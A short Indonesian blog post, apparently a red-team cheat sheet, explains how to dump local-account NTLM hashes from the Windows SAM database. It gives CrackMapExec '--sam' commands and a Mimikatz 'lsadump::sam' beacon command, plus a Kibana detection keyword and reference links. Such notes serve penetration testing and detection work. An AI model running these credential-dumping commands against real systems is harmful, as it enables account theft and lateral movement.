Post

[Credential Theft] Security Account Manager

Security Account Manager (SAM) adalah database di sistem operasi Windows yang menyimpan pengguna lokal dan kredensial terkait.

Hash NTLM dari akun lokal ini dapat diekstraksi dengan modul Mimikatz lsadump::sam. Jika kredensial administrator lokal digunakan pada seluruh lingkungan, ini dapat membuat lateral movement menjadi sangat mudah.

0x1 - Exploitation Stages

Perintah ini memerlukan hak akses yang lebih tinggi.

A. CrackMapExec

1
2
➜ crackmapexec smb <IP> -u <User> -p <Password> --sam
➜ crackmapexec smb <IP> -u <User> -p <Password> --sam --local-auth

B. Beacon + Mimikatz

1
beacon> mimikatz !lsadump::sam

OPSEC

Modul Mimikatz ini akan membuka handle ke SAM registry hive.

Kita bisa menggunakan kata kunci “Suspicious SAM Hive Handle” pada Kibana untuk melihat log ini.


0x2 - References

  • https://adsecurity.org/?page_id=1821
  • https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz
  • https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/credential-dumping/security-account-manager-sam
This post is licensed under CC BY 4.0 by the author.